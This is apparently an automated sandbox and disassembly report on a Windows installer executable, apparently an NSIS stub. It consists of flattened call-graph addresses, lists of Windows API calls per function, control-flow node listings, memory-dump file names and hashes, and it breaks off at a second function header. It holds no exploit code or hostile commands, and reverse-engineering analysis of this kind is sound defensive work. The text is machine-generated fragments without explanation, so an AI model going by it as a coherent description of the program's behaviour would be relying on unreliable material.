4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4864 402da5 4865 4030e3 4864->4865 4866 402dac 4864->4866 4867 401446 18 API calls 4866->4867 4868 402db8 4867->4868 4869 402dbf SetFilePointer 4868->4869 4869->4865 4870 402dcf 4869->4870 4870->4865 4872 405f7d wsprintfW 4870->4872 4872->4865 4873 4049a8 GetDlgItem GetDlgItem 4874 4049fe 7 API calls 4873->4874 4879 404c16 4873->4879 4875 404aa2 DeleteObject 4874->4875 4876 404a96 SendMessageW 4874->4876 4877 404aad 4875->4877 4876->4875 4880 404ae4 4877->4880 4883 406831 18 API calls 4877->4883 4878 404cfb 4881 404da0 4878->4881 4882 404c09 4878->4882 4887 404d4a SendMessageW 4878->4887 4879->4878 4891 40487a 5 API calls 4879->4891 4904 404c86 4879->4904 4886 403d6b 19 API calls 4880->4886 4884 404db5 4881->4884 4885 404da9 SendMessageW 4881->4885 4888 403df6 8 API calls 4882->4888 4889 404ac6 SendMessageW SendMessageW 4883->4889 4896 404dc7 ImageList_Destroy 4884->4896 4897 404dce 4884->4897 4902 404dde 4884->4902 4885->4884 4892 404af8 4886->4892 4887->4882 4894 404d5f SendMessageW 4887->4894 4895 404f97 4888->4895 4889->4877 4890 404ced SendMessageW 4890->4878 4891->4904 4898 403d6b 19 API calls 4892->4898 4893 404f48 4893->4882 4903 404f5d ShowWindow GetDlgItem ShowWindow 4893->4903 4899 404d72 4894->4899 4896->4897 4900 404dd7 GlobalFree 4897->4900 4897->4902 4906 404b09 4898->4906 4908 404d83 SendMessageW 4899->4908 4900->4902 4901 404bd6 GetWindowLongW SetWindowLongW 4905 404bf0 4901->4905 4902->4893 4907 40141d 80 API calls 4902->4907 4917 404e10 4902->4917 4903->4882 4904->4878 4904->4890 4909 404bf6 ShowWindow 4905->4909 4910 404c0e 4905->4910 4906->4901 4912 404b65 SendMessageW 4906->4912 4913 404bd0 4906->4913 4915 404b93 SendMessageW 4906->4915 4916 404ba7 SendMessageW 4906->4916 4907->4917 4908->4881 4924 403dc4 SendMessageW 4909->4924 4925 403dc4 SendMessageW 4910->4925 4912->4906 4913->4901 4913->4905 4915->4906 4916->4906 4918 404e54 4917->4918 4921 404e3e SendMessageW 4917->4921 4919 404f1f InvalidateRect 4918->4919 4923 404ecd SendMessageW SendMessageW 4918->4923 4919->4893 4920 404f35 4919->4920 4922 4043d9 21 API calls 4920->4922 4921->4918 4922->4893 4923->4918 4924->4882 4925->4879 4926 4030a9 SendMessageW 4927 4030c2 InvalidateRect 4926->4927 4928 4030e3 4926->4928 4927->4928 3879 4038af #17 SetErrorMode OleInitialize 3880 406328 3 API calls 3879->3880 3881 4038f2 SHGetFileInfoW 3880->3881 3953 406035 lstrcpynW 3881->3953 3883 40391d GetCommandLineW 3954 406035 lstrcpynW 3883->3954 3885 40392f GetModuleHandleW 3886 403947 3885->3886 3887 405d32 CharNextW 3886->3887 3888 403956 CharNextW 3887->3888 3899 403968 3888->3899 3889 403a02 3890 403a21 GetTempPathW 3889->3890 3955 4037f8 3890->3955 3892 403a37 3894 403a3b GetWindowsDirectoryW lstrcatW 3892->3894 3895 403a5f DeleteFileW 3892->3895 3893 405d32 CharNextW 3893->3899 3897 4037f8 11 API calls 3894->3897 3963 4035b3 GetTickCount GetModuleFileNameW 3895->3963 3900 403a57 3897->3900 3898 403a73 3901 403af8 3898->3901 3903 405d32 CharNextW 3898->3903 3939 403add 3898->3939 3899->3889 3899->3893 3906 403a04 3899->3906 3900->3895 3900->3901 4048 403885 3901->4048 3907 403a8a 3903->3907 4055 406035 lstrcpynW 3906->4055 3918 403b23 lstrcatW lstrcmpiW 3907->3918 3919 403ab5 3907->3919 3908 403aed 3911 406113 9 API calls 3908->3911 3909 403bfa 3912 403c7d 3909->3912 3914 406328 3 API calls 3909->3914 3910 403b0d 3913 405ccc MessageBoxIndirectW 3910->3913 3911->3901 3915 403b1b ExitProcess 3913->3915 3917 403c09 3914->3917 3921 406328 3 API calls 3917->3921 3918->3901 3920 403b3f CreateDirectoryW SetCurrentDirectoryW 3918->3920 4056 4067aa 3919->4056 3923 403b62 3920->3923 3924 403b57 3920->3924 3925 403c12 3921->3925 4073 406035 lstrcpynW 3923->4073 4072 406035 lstrcpynW 3924->4072 3929 406328 3 API calls 3925->3929 3932 403c1b 3929->3932 3931 403b70 4074 406035 lstrcpynW 3931->4074 3933 403c69 ExitWindowsEx 3932->3933 3938 403c29 GetCurrentProcess 3932->3938 3933->3912 3937 403c76 3933->3937 3934 403ad2 4071 406035 lstrcpynW 3934->4071 3940 40141d 80 API calls 3937->3940 3942 403c39 3938->3942 3991 405958 3939->3991 3940->3912 3941 406831 18 API calls 3943 403b98 DeleteFileW 3941->3943 3942->3933 3944 403ba5 CopyFileW 3943->3944 3950 403b7f 3943->3950 3944->3950 3945 403bee 3946 406c94 42 API calls 3945->3946 3948 403bf5 3946->3948 3947 406c94 42 API calls 3947->3950 3948->3901 3949 406831 18 API calls 3949->3950 3950->3941 3950->3945 3950->3947 3950->3949 3952 403bd9 CloseHandle 3950->3952 4075 405c6b CreateProcessW 3950->4075 3952->3950 3953->3883 3954->3885 3956 406064 5 API calls 3955->3956 3957 403804 3956->3957 3958 40380e 3957->3958 3959 40674e 3 API calls 3957->3959 3958->3892 3960 403816 CreateDirectoryW 3959->3960 3961 405eab 2 API calls 3960->3961 3962 40382a 3961->3962 3962->3892 4078 405e7c GetFileAttributesW CreateFileW 3963->4078 3965 4035f3 3985 403603 3965->3985 4079 406035 lstrcpynW 3965->4079 3967 403619 4080 40677d lstrlenW 3967->4080 3971 40362a GetFileSize 3972 403726 3971->3972 3986 403641 3971->3986 4085 4032d2 3972->4085 3974 40372f 3976 40376b GlobalAlloc 3974->3976 3974->3985 4097 403368 SetFilePointer 3974->4097 3975 403336 ReadFile 3975->3986 4096 403368 SetFilePointer 3976->4096 3979 4037e9 3982 4032d2 6 API calls 3979->3982 3980 403786 3983 40337f 33 API calls 3980->3983 3981 40374c 3984 403336 ReadFile 3981->3984 3982->3985 3989 403792 3983->3989 3988 403757 3984->3988 3985->3898 3986->3972 3986->3975 3986->3979 3986->3985 3987 4032d2 6 API calls 3986->3987 3987->3986 3988->3976 3988->3985 3989->3985 3989->3989 3990 4037c0 SetFilePointer 3989->3990 3990->3985 3992 406328 3 API calls 3991->3992 3993 40596c 3992->3993 3994 405972 3993->3994 3995 405984 3993->3995 4111 405f7d wsprintfW 3994->4111 3996 405eff 3 API calls 3995->3996 3997 4059b5 3996->3997 3999 4059d4 lstrcatW 3997->3999 4001 405eff 3 API calls 3997->4001 4000 405982 3999->4000 4102 403ec1 4000->4102 4001->3999 4004 4067aa 18 API calls 4005 405a06 4004->4005 4006 405a9c 4005->4006 4008 405eff 3 API calls 4005->4008 4007 4067aa 18 API calls 4006->4007 4009 405aa2 4007->4009 4010 405a38 4008->4010 4011 405ab2 4009->4011 4012 406831 18 API calls 4009->4012 4010->4006 4014 405a5b lstrlenW 4010->4014 4017 405d32 CharNextW 4010->4017 4013 405ad2 LoadImageW 4011->4013 4113 403ea0 4011->4113 4012->4011 4015 405b92 4013->4015 4016 405afd RegisterClassW 4013->4016 4018 405a69 lstrcmpiW 4014->4018 4019 405a8f 4014->4019 4023 40141d 80 API calls 4015->4023 4021 405b9c 4016->4021 4022 405b45 SystemParametersInfoW CreateWindowExW 4016->4022 4024 405a56 4017->4024 4018->4019 4025 405a79 GetFileAttributesW 4018->4025 4027 40674e 3 API calls 4019->4027 4021->3908 4022->4015 4028 405b98 4023->4028 4024->4014 4029 405a85 4025->4029 4026 405ac8 4026->4013 4030 405a95 4027->4030 4028->4021 4031 403ec1 19 API calls 4028->4031 4029->4019 4032 40677d 2 API calls 4029->4032 4112 406035 lstrcpynW 4030->4112 4034 405ba9 4031->4034 4032->4019 4035 405bb5 ShowWindow LoadLibraryW 4034->4035 4036 405c38 4034->4036 4037 405bd4 LoadLibraryW 4035->4037 4038 405bdb GetClassInfoW 4035->4038 4039 405073 83 API calls 4036->4039 4037->4038 4040 405c05 DialogBoxParamW 4038->4040 4041 405bef GetClassInfoW RegisterClassW 4038->4041 4042 405c3e 4039->4042 4045 40141d 80 API calls 4040->4045 4041->4040 4043 405c42 4042->4043 4044 405c5a 4042->4044 4043->4021 4047 40141d 80 API calls 4043->4047 4046 40141d 80 API calls 4044->4046 4045->4021 4046->4021 4047->4021 4049 40389d 4048->4049 4050 40388f CloseHandle 4048->4050 4120 403caf 4049->4120 4050->4049 4055->3890 4173 406035 lstrcpynW 4056->4173 4058 4067bb 4059 405d85 4 API calls 4058->4059 4060 4067c1 4059->4060 4061 406064 5 API calls 4060->4061 4068 403ac3 4060->4068 4064 4067d1 4061->4064 4062 406809 lstrlenW 4063 406810 4062->4063 4062->4064 4066 40674e 3 API calls 4063->4066 4064->4062 4065 406301 2 API calls 4064->4065 4064->4068 4069 40677d 2 API calls 4064->4069 4065->4064 4067 406816 GetFileAttributesW 4066->4067 4067->4068 4068->3901 4070 406035 lstrcpynW 4068->4070 4069->4062 4070->3934 4071->3939 4072->3923 4073->3931 4074->3950 4076 405ca6 4075->4076 4077 405c9a CloseHandle 4075->4077 4076->3950 4077->4076 4078->3965 4079->3967 4081 40678c 4080->4081 4082 406792 CharPrevW 4081->4082 4083 40361f 4081->4083 4082->4081 4082->4083 4084 406035 lstrcpynW 4083->4084 4084->3971 4086 4032f3 4085->4086 4087 4032db 4085->4087 4090 403303 GetTickCount 4086->4090 4091 4032fb 4086->4091 4088 4032e4 DestroyWindow 4087->4088 4089 4032eb 4087->4089 4088->4089 4089->3974 4093 403311 CreateDialogParamW ShowWindow 4090->4093 4094 403334 4090->4094 4098 40635e 4091->4098 4093->4094 4094->3974 4096->3980 4097->3981 4099 40637b PeekMessageW 4098->4099 4100 406371 DispatchMessageW 4099->4100 4101 403301 4099->4101 4100->4099 4101->3974 4103 403ed5 4102->4103 4118 405f7d wsprintfW 4103->4118 4105 403f49 4106 406831 18 API calls 4105->4106 4107 403f55 SetWindowTextW 4106->4107 4108 403f70 4107->4108 4109 403f8b 4108->4109 4110 406831 18 API calls 4108->4110 4109->4004 4110->4108 4111->4000 4112->4006 4119 406035 lstrcpynW 4113->4119 4115 403eb4 4116 40674e 3 API calls 4115->4116 4117 403eba lstrcatW 4116->4117 4117->4026 4118->4105 4119->4115 4121 403cbd 4120->4121 4122 4038a2 4121->4122 4123 403cc2 FreeLibrary GlobalFree 4121->4123 4124 406cc7 4122->4124 4123->4122 4123->4123 4125 4067aa 18 API calls 4124->4125 4126 406cda 4125->4126 4127 406ce3 DeleteFileW 4126->4127 4128 406cfa 4126->4128 4167 4038ae CoUninitialize 4127->4167 4129 406e77 4128->4129 4171 406035 lstrcpynW 4128->4171 4135 406301 2 API calls 4129->4135 4155 406e84 4129->4155 4129->4167 4131 406d25 4132 406d39 4131->4132 4133 406d2f lstrcatW 4131->4133 4136 40677d 2 API calls 4132->4136 4134 406d3f 4133->4134 4138 406d4f lstrcatW 4134->4138 4140 406d57 lstrlenW FindFirstFileW 4134->4140 4137 406e90 4135->4137 4136->4134 4141 40674e 3 API calls 4137->4141 4137->4167 4138->4140 4139 4062cf 11 API calls 4139->4167 4144 406e67 4140->4144 4168 406d7e 4140->4168 4142 406e9a 4141->4142 4145 4062cf 11 API calls 4142->4145 4143 405d32 CharNextW 4143->4168 4144->4129 4146 406ea5 4145->4146 4147 405e5c 2 API calls 4146->4147 4148 406ead RemoveDirectoryW 4147->4148 4152 406ef0 4148->4152 4153 406eb9 4148->4153 4149 406e44 FindNextFileW 4151 406e5c FindClose 4149->4151 4149->4168 4151->4144 4154 404f9e 25 API calls 4152->4154 4153->4155 4156 406ebf 4153->4156 4154->4167 4155->4139 4158 4062cf 11 API calls 4156->4158 4157 4062cf 11 API calls 4157->4168 4159 406ec9 4158->4159 4162 404f9e 25 API calls 4159->4162 4160 406cc7 72 API calls 4160->4168 4161 405e5c 2 API calls 4163 406dfa DeleteFileW 4161->4163 4164 406ed3 4162->4164 4163->4168 4165 406c94 42 API calls 4164->4165 4165->4167 4166 404f9e 25 API calls 4166->4149 4167->3909 4167->3910 4168->4143 4168->4149 4168->4157 4168->4160 4168->4161 4168->4166 4169 404f9e 25 API calls 4168->4169 4170 406c94 42 API calls 4168->4170 4172 406035 lstrcpynW 4168->4172 4169->4168 4170->4168 4171->4131 4172->4168 4173->4058 4929 401cb2 4930 40145c 18 API calls 4929->4930 4931 401c54 4930->4931 4932 4062cf 11 API calls 4931->4932 4933 401c64 4931->4933 4934 401c59 4932->4934 4935 406cc7 81 API calls 4934->4935 4935->4933 3705 4021b5 3706 40145c 18 API calls 3705->3706 3707 4021bb 3706->3707 3708 40145c 18 API calls 3707->3708 3709 4021c4 3708->3709 3710 40145c 18 API calls 3709->3710 3711 4021cd 3710->3711 3712 40145c 18 API calls 3711->3712 3713 4021d6 3712->3713 3714 404f9e 25 API calls 3713->3714 3715 4021e2 ShellExecuteW 3714->3715 3716 40221b 3715->3716 3717 40220d 3715->3717 3718 4062cf 11 API calls 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 402230 3718->3720 3719->3716 4936 402238 4937 40145c 18 API calls 4936->4937 4938 40223e 4937->4938 4939 4062cf 11 API calls 4938->4939 4940 40224b 4939->4940 4941 404f9e 25 API calls 4940->4941 4942 402255 4941->4942 4943 405c6b 2 API calls 4942->4943 4944 40225b 4943->4944 4945 4062cf 11 API calls 4944->4945 4953 4022ac CloseHandle 4944->4953 4950 40226d 4945->4950 4947 4030e3 4948 402283 WaitForSingleObject 4949 402291 GetExitCodeProcess 4948->4949 4948->4950 4952 4022a3 4949->4952 4949->4953 4950->4948 4951 40635e 2 API calls 4950->4951 4950->4953 4951->4948 4955 405f7d wsprintfW 4952->4955 4953->4947 4955->4953 4956 404039 4957 404096 4956->4957 4958 404046 lstrcpynA lstrlenA 4956->4958 4958->4957 4959 404077 4958->4959 4959->4957 4960 404083 GlobalFree 4959->4960 4960->4957 4961 401eb9 4962 401f24 4961->4962 4965 401ec6 4961->4965 4963 401f53 GlobalAlloc 4962->4963 4967 401f28 4962->4967 4969 406831 18 API calls 4963->4969 4964 401ed5 4968 4062cf 11 API calls 4964->4968 4965->4964 4971 401ef7 4965->4971 4966 401f36 4985 406035 lstrcpynW 4966->4985 4967->4966 4970 4062cf 11 API calls 4967->4970 4980 401ee2 4968->4980 4973 401f46 4969->4973 4970->4966 4983 406035 lstrcpynW 4971->4983 4975 402708 4973->4975 4976 402387 GlobalFree 4973->4976 4976->4975 4977 401f06 4984 406035 lstrcpynW 4977->4984 4978 406831 18 API calls 4978->4980 4980->4975 4980->4978 4981 401f15 4986 406035 lstrcpynW 4981->4986 4983->4977 4984->4981 4985->4973 4986->4975

                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                    Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                    • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                    • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                                                                                                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                    Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
